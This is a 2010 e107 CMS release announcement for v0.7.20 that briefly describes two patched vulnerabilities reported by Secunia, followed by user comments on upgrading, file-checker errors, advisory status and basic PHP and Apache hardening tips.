Secunia Research contacted us a few days ago about two potential security issues. We have been working to reproduce and fix the issues, while they have held off making them public.

While I won't go into too much detail, I will say that one involves being able to upload a malicious file. It requires an odd set of preferences and a missing file to allow it to happen though, so the threat is pretty low in our opinion.
The other was a js code injection. The user was able to inject some js code that would run if an admin edited the users post. This was only open if the site had the 'personal content manager' option enabled in the content plugin.

Both have now been fixed...thanks again to Secunia for pointing them out to us.

Of course, the release also includes all other bug fixes that have been committed since the last release.

Link to downloads here: http://e107.org/edownload.php

Changes found here in the changelog

printer friendly LAN_NEWS_24

Comments

15 Apr 2010
  • e107 Support Team Leader
Well that caught me by surprise this morning.

Thanks for making e107 as secure as possible everyone.
16 Apr 2010
Thanks for the update on the ball, as usual.

just a quick question. after updating, my file checker is throwing up the same errors (across 3 sites all on different servers) in: ver.php and user.php as after the v0.7.19 update? has this not been corrected from the last release?

Many thanks again for your superb work
16 Apr 2010
  • e107 Support Team Leader
I was using SVN and I had a lot of files that weren't validating using the v7.20 core image so I replaced those files from the full release and all is now fine

Last time there was an issue with McFly's timezone on creating the build if my memory serves me right so use the core image file from v0.7.12 full zip and replace any 'non validating' files from that as well would be my advice
rgk
17 Apr 2010
  • e107 Support Team
ty for the release
18 Apr 2010
Thanks !
Upgrade done on 3 sites without any problem
18 Apr 2010
I seemed to have lost some of my text edits on custom pages. I can't get a line return to work. Was okay before the upgrade. My text rendering is set as WYSIWYG.

Sorry if this comment should have gone elsewhere...
18 Apr 2010
  • e107 Site administrator
  • e107 Core developer
  • e107 Translation Team Leader
@RNS: please post upgrade/installation problems in the forum: [-link-]
19 Apr 2010
Secunia is saying that 6 of 26 advisories are still unpatched. Is this just a case of them not being updated on the patches, or are there still issues which remain unsolved?

Either way, it isn't good for the e107 image.
19 Apr 2010
  • e107 Support Team Leader
If there were known issues, they would have been fixed for v0.7.20
19 Apr 2010
Everything working well. I did a .18 to .20 update. No problems found. Thanks for the update!
19 Apr 2010
Updated without problems

Here the translated to spanish
19 Apr 2010
2dopey said
If there were known issues, they would have been fixed for v0.7.20


I figured as much, but felt it worth mentioning
19 Apr 2010
  • e107 Main site administrator
  • e107 Core developer
@migs - have certainly looked at all those vulnerabilities, and pretty certain all fixed (some rather a long time ago) - just wanted to be sure before contacting Secunia. Got rather diverted by more immediate threats!
19 Apr 2010
Steve, that's exactly what I thought, hence my first question being about whether it was just a case of updating Secunia.

Whilst I was there, I had a scout around. Joomla and Drupal show no outstanding advisories for the core files, but seem to have a ton of issues with plugins. Wordpress has about half a dozen outstanding for the core and a million widget issues. Presumably the plugin/widget issues are 3rd party.
20 Apr 2010
All working. Well done, everyone.
22 Apr 2010
Updated without problems, thanks!
24 Apr 2010
I received this email today. how would I know if this is covered in this update?

ello,

Your account, xxxxxxx has files which are infected with viruses or are otherwise concerning.

You can find a list of potential problem files below.
Contact [email] if you have any questions.

Note that files named core.* can be deleted outright. Most files that mention 'broken executable' are safe to retain. If any of the below files references trojan, bot or worm, it must be removed immediately and the software within your account must be kept up to date to prevent any future exploitations.

/home/xxxxxx/public_html/e107_plugins/calendar_menu/readme.pdf: Exploit.PDF-21809

Thank you,
Fused Network Support
25 Apr 2010
That looks like a false positive from a clamav scan...
Ask the server administrators to update their anti-virus scanners.
13 May 2010
About time this was patched!

I had someone upload that "malicious file" to my server. Logs here: [-link-]

A few ways to protect yourself:
1) In your php.ini file, set "allow_url_fopen = Off" and "allow_url_include = Off" since the hack depends on them.
2) In Apache's httpd.conf, disable PHP Engine in EVERY folder that has write access.

Comments are locked